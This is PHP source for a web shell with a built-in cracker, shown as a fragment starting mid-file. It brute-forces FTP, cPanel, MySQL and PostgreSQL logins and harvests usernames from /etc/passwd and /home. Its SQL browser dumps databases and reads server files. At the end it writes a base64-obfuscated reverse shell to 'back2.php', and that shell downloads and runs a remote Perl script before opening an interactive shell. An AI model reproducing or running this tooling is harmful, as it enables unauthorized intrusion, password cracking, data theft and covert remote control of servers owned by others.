                                                <input name="cracktype" value="ftp" style="font-weight: 700;" type="radio"></font></span></font><font style="font-weight: 700;" size="2" face="Tahoma">
                                                </font><span style="font-weight: 700;">
                                                <font size="2" face="Tahoma">Ftp </font>
                                                <font size="2" color="#FFFFFF" face="Tahoma">
                                                (21)</font></span>
                                                <br>
                                                <font style="font-weight:700" size="2" face="Tahoma" color="#008000"><span lang="ar-sa">Timeout delay</span>
                                                <input type="text" name="connect_timeout" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $connect_timeout;?>"></input>
                                                <br>
                                                <input type="checkbox" name="bruteforce" value="true"><font style="font-weight:700" size="2" face="Tahoma" color="#008000"><span lang="ar-sa">Bruteforce</span></input>
                                                <select name="charset" style="border: 2px solid #1D1D1D;background: black;color:RED">
                                                 <option value="all">All Letters + Numbers</option>
                                                  <option value="numeric">Numbers</option>
                                                 <option value="letters">Letters</option>
                                                 <option value="symbols">Symbols</option>
                                                 <option value="lowercase">Lower Letters</option>
                                                 <option value="uppercase">Higher Letters</option>
                                                 <option value="lowernumeric">Lower Letters + Numbers</option>
                                                 <option value="uppernumeric">Upper Letters + Numbers</option>
                                                 <option value="lowersymbols">Lower Letters + Symbols</option>
                                                 <option value="uppersymbols">Upper Letters + Symbols</option>
                                                 <option value="letterssymbols">All Letters + Symbols</option>
                                                 <option value="numberssymbols">Numbers + Symbols</option>
                                                 <option value="lowernumericsymbols">Lower Letters + Numbers + Symbols</option>
                                                 <option value="uppernumericsymbols">Upper Letters + Numbers + Symbols</option>
                                                 <option value="lettersnumericsymbols">All Letters + Numbers + Symbols</option>

                                                </select>
                                                <br>
                                                <font style="font-weight:700" size="2" face="Tahoma" color="#008000"><span lang="ar-sa">Min Bruteforce Length:</span></font>
                                                <input type="text" name="min_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $min_length;?>"></input>
                                                <br>
                                                <font style="font-weight:700" size="2" face="Tahoma" color="#008000"><span lang="ar-sa">Max Bruteforce Length:</span></font>
                                                <input type="text" name="max_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $max_length;?>"></input>
                                                </p>
        <p align="center">&nbsp;&nbsp;&nbsp;&nbsp;
        <input type="submit" value="Go" name="submit" style="color: #008000; font-weight: bold; border: 1px solid #333333; background-color: #000000"></p>
                        </td>
                </tr>
        </table>

    <p align="center"></td>
  </tr>
  </form>

<?php
function brute(){
    global $vals,$min_length,$max_length;
    global $target,$pureuser,$connect_timeout;
    $min=$min_length;
    $max=$max_length;
    $A = array();
    $numVals = count($vals);
    $incDone = "";
    $realMax = "";
    $currentVal = "";
    $firstVal = "";
    for ($i = 0; $i < ($max + 1); $i++) {
        $A[$i] = -1;
    }
    
    for ($i = 0; $i < $max; $i++) {
        $realMax = $realMax . $vals[$numVals - 1];
    }
    for ($i = 0; $i < $min; $i++) {
        $A[$i] = $vals[0];
    }
    $i = 0;
    while ($A[$i] != -1) {
        $firstVal .= $A[$i];
        $i++;
    }
    //echo $firstVal . "<br>";
    cpanel_check($target,$pureuser,$firstVal,$connect_timeout);
    
    while (1) {
        for ($i = 0; $i < ($max + 1); $i++) {
            if ($A[$i] == -1) {
                break;
            }
        }
        $i--;
        $incDone = 0;
        while (!$incDone) {    
            for ($j = 0; $j < $numVals; $j++) {
                if ($A[$i] == $vals[$j]) {
                    break;
                }
            }
            if ($j == ($numVals - 1)) {
                $A[$i] = $vals[0];
                $i--;
                if ($i < 0) {
                    for ($i = 0; $i < ($max + 1); $i++) {
                        if ($A[$i] == -1) {
                            break;
                        }
                    }
                    $A[$i] = $vals[0];
                    $A[$i + 1] = -1;
                    $incDone = 1;
                    print "Starting " . (strlen($currentVal) + 1) . " Characters Cracking<br>";
                }
            } else {
                $A[$i] = $vals[$j + 1];
                $incDone = 1;
            }
        }
        $i = 0;
        $currentVal = "";
        while ($A[$i] != -1) {
            $currentVal = $currentVal . $A[$i];
            $i++;
        }
        cpanel_check($target,$pureuser,$currentVal,$connect_timeout);
        //echo $currentVal . "<br>";
        if ($currentVal == $realMax) {
            return 0;
        }
    }
}
function getmicrotime() {
   list($usec, $sec) = explode(" ",microtime());
   return ((float)$usec + (float)$sec);
} 

function ftp_check($host,$user,$pass,$timeout)
{
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
 $data = curl_exec($ch);
 if ( curl_errno($ch) == 28 )
 {
 print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
 <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
 Please Check The Target Hostname .</font></font></b></p>";exit;
 }
 else if ( curl_errno($ch) == 0 )
 {
  print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\"   style=\"font-size: 9pt\"><b><font color=\"#008000\">
 Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
 }
 curl_close($ch);
}
function cpanel_check($host,$user,$pass,$timeout)
{
 global $cpanel_port;
 $ch = curl_init();
 //echo "http://$host:".$cpanel_port." $user $pass<br>";
 curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
 $data = curl_exec($ch);
 if ( curl_errno($ch) == 28 )
 {
  print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
  <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
  Please Check The Target Hostname .</font></font></b></p>";exit;
 }
 else if ( curl_errno($ch) == 0 )
 {
  print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\"   style=\"font-size: 9pt\"><b><font color=\"#008000\"> 
  Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
  and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
 }
 curl_close($ch);
}

$time_start = getmicrotime();

if(isset($submit) && !empty($submit))
{
 if(empty($users) && empty($pass) )
 {
   print "<p><font face=\"Tahoma\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; }
 if(empty($users)){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; }
 if(empty($pass) && $_REQUEST['bruteforce']!="true" ){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; };
 $userlist=explode("\n",$users);
 $passlist=explode("\n",$pass);
 print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0000\">
 Cracking Process Started, Please Wait ...</font></b><br><br>";

 if(isset($_POST['connect_timeout']))
 {
  $connect_timeout=$_POST['connect_timeout'];
 }

 if($cracktype == "ftp")
 {
  foreach ($userlist as $user) 
  {
   $pureuser = trim($user);
   foreach ($passlist as $password ) 
   {
     $purepass = trim($password);
     ftp_check($target,$pureuser,$purepass,$connect_timeout);
   }
  }
 }
 
 if ($cracktype == "cpanel" || $cracktype == "cpanel2")
 {
  if($cracktype == "cpanel2")
  {
   $cpanel_port="23";
  }
  else
   $cpanel_port="2082";
  
  foreach ($userlist as $user) 
  {
   $pureuser = trim($user);
   print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\"  style=\"font-size: 9pt\" color=\"#FF0800\">
   Processing user $pureuser ... </font></b>";
   if($_POST['bruteforce']=="true")
   {
    echo " bruteforcing ..";
    echo "<br>";
    brute();
   }
   else
   {
     echo "<br>"; 
     foreach ($passlist as $password ) 
     {
       $purepass = trim($password);
       cpanel_check($target,$pureuser,$purepass,$connect_timeout);
     }
   }
  }
  $time_end = getmicrotime();
$time = $time_end - $time_start; 
 print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0000\">
 Cracking Finished. Elapsed time: $time</font> seconds</b><br><br>";
  }
}



?>



      <form style="border: 0px ridge #FFFFFF">




    <p align="center"></td>
  </tr><div align="center">

                <tr>

</form>


<div align="center">
 <table border="1" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="1">
<tr>
<td bordercolorlight="#008000" bordercolordark="#006A00">
<p align="left">
<textarea style="border: 2px solid #1D1D1D;background: #200000;color:#CCFFFF" method='POST' rows="25" name="S1" cols="22">


<?php
   if (isset($_GET['user']))
      system('ls /var/mail'); 
   if (isset($_POST['grab_users1'])) //grab users from /etc/passwd
   {
      $lines=file("/etc/passwd");
      foreach($lines as $nr=>$val)
      {
       $str=explode(":",$val);
       echo $str[0]."\n";
      }
     
   }
   if (isset($_POST['grab_users2']))
    {
     $dir = "/home/";
     if ($dh = opendir($dir)) {
        while (($file = readdir($dh)) !== false) {
            echo $file. "\n";
        }
            closedir($dh);
        }
    }
?>
</textarea>
<table>
<tr>
<form action="" method="POST">
<input type="hidden" value="true" name="grab_users1"></input>
<input type=submit value="Grab Usernames from /etc/passwd"></input>
</form>
</tr>
<br>
<tr>
<form action="" method="POST">
<input type="hidden" value="true" name="grab_users2"></input>
<input type=submit value="Grab Usernames from /home/"></input>
</form>
</tr>
<br>
<tr>
<form action="" method="POST">
<input type="hidden" value="true" name="grab_users3"></input>
<input type=submit value="Grab Usernames from /home/ II"></input>
</form>
</tr>
</form>
</table>
<?php
if (isset($_POST['grab_users3']))
    {
        error_reporting(0);
     $dir = "/home/";
     if ($dh = opendir($dir)) 
     {
        $f = readdir($dh);$f = readdir($dh);
        while (($f = readdir($dh)) !== false) 
        {
            //echo $f. "\n";
            $f.="/";
            $dh2=opendir($dir.$f);
            $f2 = readdir($dh2);$f2 = readdir($dh2);
            while (($f2 = readdir($dh2)) !== false) 
            {
             //echo $f2. "\n";
             $f2.="/";
             $dh3=opendir($dir.$f.$f2);
             $f3 = readdir($dh3);$f3 = readdir($dh3);
             while (($f3 = readdir($dh3)) !== false) 
             {
              echo $f3. "<br>";
             }
            }
            
        }
            closedir($dh);
     }
    }
?> ');
$write = fwrite ($file ,$sa);
fclose($file);

	
	
	
	if( isset($_POST['proto']) ) {
		echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
		if( $_POST['proto'] == 'ftp' ) {
			function bruteForce($ip,$port,$login,$pass) {
				$fp = @ftp_connect($ip, $port?$port:21);
				if(!$fp) return false;
				$res = @ftp_login($fp, $login, $pass);
				@ftp_close($fp);
				return $res;
			}
		} elseif( $_POST['proto'] == 'mysql' ) {
			function bruteForce($ip,$port,$login,$pass) {
				$res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
				@mysql_close($res);
				return $res;
			}
		} elseif( $_POST['proto'] == 'pgsql' ) {
			function bruteForce($ip,$port,$login,$pass) {
				$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
				$res = @pg_connect($str);
				@pg_close($res);
				return $res;
			}
		}
		$success = 0;
		$attempts = 0;
		$server = explode(":", $_POST['server']);
		if($_POST['type'] == 1) {
			$temp = @file('/etc/passwd');
			if( is_array($temp) )
				foreach($temp as $line) {
					$line = explode(":", $line);
					++$attempts;
					if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
						$success++;
						echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
					}
					if(@$_POST['reverse']) {
						$tmp = "";
						for($i=strlen($line[0])-1; $i>=0; --$i)
							$tmp .= $line[0][$i];
						++$attempts;
						if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
							$success++;
							echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
						}
					}
				}
		} elseif($_POST['type'] == 2) {
			$temp = @file($_POST['dict']);
			if( is_array($temp) )
				foreach($temp as $line) {
					$line = trim($line);
					++$attempts;
					if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
						$success++;
						echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
					}
				}
		}
		echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
	}
	echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
		.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
		.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
		.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
		.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
		.'<span>Server:port</span></td>'
		.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
		.'<tr><td><span>Brute type</span></td>'
		.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
		.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
		.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
		.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
		.'<td><input type=text name=login value="root"></td></tr>'
		.'<tr><td><span>Dictionary</span></td>'
		.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
		.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr>';
		echo '<tr><td><b><a href=/dkcpanel.php>CpanelBruterv1.0</a><br></tr></form></table>';
	echo '</div><br>';
	
	wsoFooter();
}

function actionSql() {
	class DbClass {
		var $type;
		var $link;
		var $res;
		function DbClass($type)	{
			$this->type = $type;
		}
		function connect($host, $user, $pass, $dbname){
			switch($this->type)	{
				case 'mysql':
					if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
					break;
				case 'pgsql':
					$host = explode(':', $host);
					if(!$host[1]) $host[1]=5432;
					if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
					break;
			}
			return false;
		}
		function selectdb($db) {
			switch($this->type)	{
				case 'mysql':
					if (@mysql_select_db($db))return true;
					break;
			}
			return false;
		}
		function query($str) {
			switch($this->type) {
				case 'mysql':
					return $this->res = @mysql_query($str);
					break;
				case 'pgsql':
					return $this->res = @pg_query($this->link,$str);
					break;
			}
			return false;
		}
		function fetch() {
			$res = func_num_args()?func_get_arg(0):$this->res;
			switch($this->type)	{
				case 'mysql':
					return @mysql_fetch_assoc($res);
					break;
				case 'pgsql':
					return @pg_fetch_assoc($res);
					break;
			}
			return false;
		}
		function listDbs() {
			switch($this->type)	{
				case 'mysql':
					return $this->res = @mysql_list_dbs($this->link);
				break;
				case 'pgsql':
					return $this->res = $this->query("SELECT datname FROM pg_database");
				break;
			}
			return false;
		}
		function listTables() {
			switch($this->type)	{
				case 'mysql':
					return $this->res = $this->query('SHOW TABLES');
				break;
				case 'pgsql':
					return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_shadow'");
				break;
			}
			return false;
		}
		function error() {
			switch($this->type)	{
				case 'mysql':
					return @mysql_error($this->link);
				break;
				case 'pgsql':
					return @pg_last_error($this->link);
				break;
			}
			return false;
		}
		function setCharset($str) {
			switch($this->type)	{
				case 'mysql':
					if(function_exists('mysql_set_charset'))
						return @mysql_set_charset($str, $this->link);
					else
						$this->query('SET CHARSET '.$str);
					break;
				case 'pgsql':
					return @pg_set_client_encoding($this->link, $str);
					break;
			}
			return false;
		}
		function loadFile($str) {
			switch($this->type)	{
				case 'mysql':
					return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
				break;
				case 'pgsql':
					$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
					$r=array();
					while($i=$this->fetch())
						$r[] = $i['file'];
					$this->query('drop table wso2');
					return array('file'=>implode("
",$r));
				break;
			}
			return false;
		}
		function dump($table) {
			switch($this->type)	{
				case 'mysql':
					$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
					$create = mysql_fetch_array($res);
					echo $create[1].";

";
					$this->query('SELECT * FROM `'.$table.'`');
					while($item = $this->fetch()) {
						$columns = array();
						foreach($item as $k=>$v) {
							$item[$k] = "'".@mysql_real_escape_string($v)."'";
							$columns[] = "`".$k."`";
						}
					echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."
";
					}
				break;
				case 'pgsql':
					$this->query('SELECT * FROM '.$table);
					while($item = $this->fetch()) {
						$columns = array();
						foreach($item as $k=>$v) {
							$item[$k] = "'".addslashes($v)."'";
							$columns[] = $k;
						}
					echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."
";
					}
				break;
			}
			return false;
		}
	};
	$db = new DbClass($_POST['type']);
	if(@$_POST['p2']=='download') {
		ob_start("ob_gzhandler", 4096);
		$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
		$db->selectdb($_POST['sql_base']);
		header("Content-Disposition: attachment; filename=dump.sql");
		header("Content-Type: text/plain");
		foreach($_POST['tbl'] as $v)
				$db->dump($v);
		exit;
	}
	wsoHeader();
	echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' ";
    if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
<td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
<td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
	$tmp = "<input type=text name=sql_base value=''>";
	if(isset($_POST['sql_host'])){
		if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
			switch($_POST['charset']) {
				case "Windows-1251": $db->setCharset('cp1251'); break;
				case "UTF-8": $db->setCharset('utf8'); break;
				case "KOI8-R": $db->setCharset('koi8r'); break;
				case "KOI8-U": $db->setCharset('koi8u'); break;
				case "cp866": $db->setCharset('cp866'); break;
			}
			$db->listDbs();
			echo "<select name=sql_base><option value=''></option>";
			while($item = $db->fetch()) {
				list($key, $value) = each($item);
				echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
			}
			echo '</select>';
		}
		else echo $tmp;
	}else
		echo $tmp;
	echo "</td>
				<td><input type=submit value='>>'></td>
			</tr>
		</table>
		<script>
			function st(t,l) {
				document.sf.p1.value = 'select';
				document.sf.p2.value = t;
				if(l!=null)document.sf.p3.value = l;
				document.sf.submit();
			}
			function is() {
				for(i=0;i<document.sf.elements['tbl[]'].length;++i)
					document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
			}
		</script>";
	if(isset($db) && $db->link){
		echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
			if(!empty($_POST['sql_base'])){
				$db->selectdb($_POST['sql_base']);
				echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
				$tbls_res = $db->listTables();
				while($item = $db->fetch($tbls_res)) {
					list($key, $value) = each($item);
					$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
					$value = htmlspecialchars($value);
					echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
				}
				echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
				if(@$_POST['p1'] == 'select') {
					$_POST['p1'] = 'query';
					$db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
					$num = $db->fetch();
					$num = $num['n'];
					echo "<span>".$_POST['p2']."</span> ($num) ";
					for($i=0;$i<($num/30);$i++)
						if($i != (int)$_POST['p3'])
							echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
						else
							echo ($i+1)," ";
					if($_POST['type']=='pgsql')
						$_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
					else
						$_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
					echo "<br><br>";
				}
				if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
					$db->query(@$_POST['p3']);
					if($db->res !== false) {
						$title = false;
						echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
						$line = 1;
						while($item = $db->fetch())	{
							if(!$title)	{
								echo '<tr>';
								foreach($item as $key => $value)
									echo '<th>'.$key.'</th>';
								reset($item);
								$title=true;
								echo '</tr><tr>';
								$line = 2;
							}
							echo '<tr class="l'.$line.'">';
							$line = $line==1?2:1;
							foreach($item as $key => $value) {
								if($value == null)
									echo '<td><i>null</i></td>';
								else
									echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
							}
							echo '</tr>';
						}
						echo '</table>';
					} else {
						echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
					}
				}
				echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
				echo "</td></tr>";
			}
			echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
			if(@$_POST['p1'] == 'loadfile') {
				$file = $db->loadFile($_POST['p2']);
				echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
			}
	}
	echo '</div>';
	wsoFooter();
}
function actionNetwork() {
	wsoHeader();
	echo '<tr><td><a href=/dkcgi/cgi.pl>cgi script 1</a><br></tr></form></table>';

$file = fopen($dir."back2.php" ,"w+");
$sa=base64_decode('X3NoZWxsX2F0aWxkaV8NCjw/cGhwIA0Kc2V0X3RpbWVfbGltaXQgKDApOw0KJFZFUlNJT04gPSAiMS4wIjsNCiRpcCA9IGdldGVudiAoJ1JFTU9URV9BRERSJyk7ICAvLyANCiRwb3J0ID0gNzA7ICAgICAgIC8vIENIQU5HRSBUSElTDQokY2h1bmtfc2l6ZSA9IDE0MDA7DQokd3JpdGVfYSA9IG51bGw7DQokZXJyb3JfYSA9IG51bGw7DQokc2hlbGwgPSAnY2QgL2Rldi9zaG07IHdnZXQgd3d3Lm5idmsubmwvdy8xMC50eHQ7IHBlcmwgMTAudHh0OyAvYmluL3NoIC1pJzsNCiRkYWVtb24gPSAwOw0KJGRlYnVnID0gMDsNCg0KLy8NCi8vIERhZW1vbmlzZSBvdXJzZWxmIGlmIHBvc3NpYmxlIHRvIGF2b2lkIHpvbWJpZXMgbGF0ZXINCi8vDQoNCi8vIHBjbnRsX2ZvcmsgaXMgaGFyZGx5IGV2ZXIgYXZhaWxhYmxlLCBidXQgd2lsbCBhbGxvdyB1cyB0byBkYWVtb25pc2UNCi8vIG91ciBwaHAgcHJvY2VzcyBhbmQgYXZvaWQgem9tYmllcy4gIFdvcnRoIGEgdHJ5Li4uDQppZiAoZnVuY3Rpb25fZXhpc3RzKCdwY250bF9mb3JrJykpIHsNCiAgIC8vIEZvcmsgYW5kIGhhdmUgdGhlIHBhcmVudCBwcm9jZXNzIGV4aXQNCiAgICRwaWQgPSBwY250bF9mb3JrKCk7DQogICANCiAgIGlmICgkcGlkID09IC0xKSB7DQogICAgICBwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOw0KICAgICAgZXhpdCgxKTsNCiAgIH0NCiAgIA0KICAgaWYgKCRwaWQpIHsNCiAgICAgIGV4aXQoMCk7ICAvLyBQYXJlbnQgZXhpdHMNCiAgIH0NCg0KICAgLy8gTWFrZSB0aGUgY3VycmVudCBwcm9jZXNzIGEgc2Vzc2lvbiBsZWFkZXINCiAgIC8vIFdpbGwgb25seSBzdWNjZWVkIGlmIHdlIGZvcmtlZA0KICAgaWYgKHBvc2l4X3NldHNpZCgpID09IC0xKSB7DQogICAgICBwcmludGl0KCJFcnJvcjogQ2FuJ3Qgc2V0c2lkKCkiKTsNCiAgICAgIGV4aXQoMSk7DQogICB9DQoNCiAgICRkYWVtb24gPSAxOw0KfSBlbHNlIHsNCiAgIHByaW50aXQoIldBUk5JTkc6IEZhaWxlZCB0byBkYWVtb25pc2UuICBUaGlzIGlzIHF1aXRlIGNvbW1vbiBhbmQgbm90IGZhdGFsLiIpOw0KfQ0KDQovLyBDaGFuZ2UgdG8gYSBzYWZlIGRpcmVjdG9yeQ0KY2hkaXIoIi8iKTsNCg0KLy8gUmVtb3ZlIGFueSB1bWFzayB3ZSBpbmhlcml0ZWQNCnVtYXNrKDApOw0KDQovLw0KLy8gRG8gdGhlIHJldmVyc2Ugc2hlbGwuLi4NCi8vDQoNCi8vIE9wZW4gcmV2ZXJzZSBjb25uZWN0aW9uDQokc29jayA9IGZzb2Nrb3BlbigkaXAsICRwb3J0LCAkZXJybm8sICRlcnJzdHIsIDMwKTsNCmlmICghJHNvY2spIHsNCiAgIHByaW50aXQoIiRlcnJzdHIgKCRlcnJubykiKTsNCiAgIGV4aXQoMSk7DQp9DQoNCi8vIFNwYXduIHNoZWxsIHByb2Nlc3MNCiRkZXNjcmlwdG9yc3BlYyA9IGFycmF5KA0KICAgMCA9PiBhcnJheSgicGlwZSIsICJyIiksICAvLyBzdGRpbiBpcyBhIHBpcGUgdGhhdCB0aGUgY2hpbGQgd2lsbCByZWFkIGZyb20NCiAgIDEgPT4gYXJyYXkoInBpcGUiLCAidyIpLCAgLy8gc3Rkb3V0IGlzIGEgcGlwZSB0aGF0IHRoZSBjaGlsZCB3aWxsIHdyaXRlIHRvDQogICAyID0+IGFycmF5KCJwaXBlIiwgInciKSAgIC8vIHN0ZGVyciBpcyBhIHBpcGUgdGhhdCB0aGUgY2hpbGQgd2lsbCB3cml0ZSB0bw0KKTsNCg0KJHByb2Nlc3MgPSBwcm9jX29wZW4oJHNoZWxsLCAkZGVzY3JpcHRvcnNwZWMsICRwaXBlcyk7DQplY2hvICRwcm9jZXNzOw0KaWYgKCFpc19yZXNvdXJjZSgkcHJvY2VzcykpIHsNCiAgIHByaW50aXQoIkVSUk9SOiBDYW4ndCBzcGF3biBzaGVsbCIpOw0KICAgZXhpdCgxKTsNCn0NCg0KLy8gU2V0IGV2ZXJ5dGhpbmcgdG8gbm9uLWJsb2NraW5nDQovLyBSZWFzb246IE9jY3Npb25hbGx5IHJlYWRzIHdpbGwgYmxvY2ssIGV2ZW4gdGhvdWdoIHN0cmVhbV9zZWxlY3QgdGVsbHMgdXMgdGhleSB3b24ndA0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMF0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMV0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMl0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkc29jaywgMCk7DQoNCnByaW50aXQoIlN1Y2Nlc3NmdWxseSBvcGVuZWQgcmV2ZXJzZSBzaGVsbCB0byAkaXA6JHBvcnQiKTsNCg0Kd2hpbGUgKDEpIHsNCiAgIC8vIENoZWNrIGZvciBlbmQgb2YgVENQIGNvbm5lY3Rpb24NCiAgIGlmIChmZW9mKCRzb2NrKSkgew0KICAgICAgcHJpbnRpdCgiRVJST1I6IFNoZWxsIGNvbm5lY3Rpb24gdGVybWluYXRlZCIpOw0KICAgICAgYnJlYWs7DQogICB9DQoNCiAgIC8vIENoZWNrIGZvciBlbmQgb2YgU1RET1VUDQogICBpZiAoZmVvZigkcGlwZXNbMV0pKSB7DQogICAgICBwcmludGl0KCJFUlJPUjogU2hlbGwgcHJvY2VzcyB0ZXJtaW5hdGVkIik7DQogICAgICBicmVhazsNCiAgIH0NCg0KICAgLy8gV2FpdCB1